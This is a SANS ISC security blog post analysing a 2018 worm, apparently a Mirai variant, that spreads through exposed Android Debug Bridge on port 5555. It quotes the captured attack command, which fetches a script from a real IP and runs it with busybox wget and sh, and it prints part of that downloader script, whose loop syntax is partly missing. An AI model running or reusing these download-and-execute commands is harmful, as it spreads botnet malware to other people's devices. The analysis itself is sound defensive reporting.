Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp)

Published: 2018-07-10
Last Updated: 2018-07-10 14:34:35 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Today, I noticed a marked increase in port 5555 scans.

Port 5555 Traffic July 10th 2018

Our honeypot detected odd traffic on this port:

OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs

Note that our honeypot has a web server listening on this port, so it is not going to respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge, an optional feature in the Android operating system. Recently, researchers discovered that this feature appears to be enabled on some Android phones [1]. The feature does allow for full shell access to the phone, and the above command may be executed.

The initial script downloaded:



for a in $n
    cp /system/bin/sh $a
    busybox wget http://$http_server/adb/$a -O -> $a
    chmod 777 $a

for a in $n
    rm $a

Which then downloads the actual "worm" for various platforms and attempts to run them. A quick analysis of the file via virus total suggests that this is a Mirai variant [2]. 

The initial download URL appears to be hardcoded into the binary. It does not look like it turns the infected system into a web server to spread the malware. Instead, it just refers to, a data center in Spain (the network was notified via and

Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load, or due to the ISP taking down the site. Virustotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses [3].


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

1 comment(s)
Diary Archives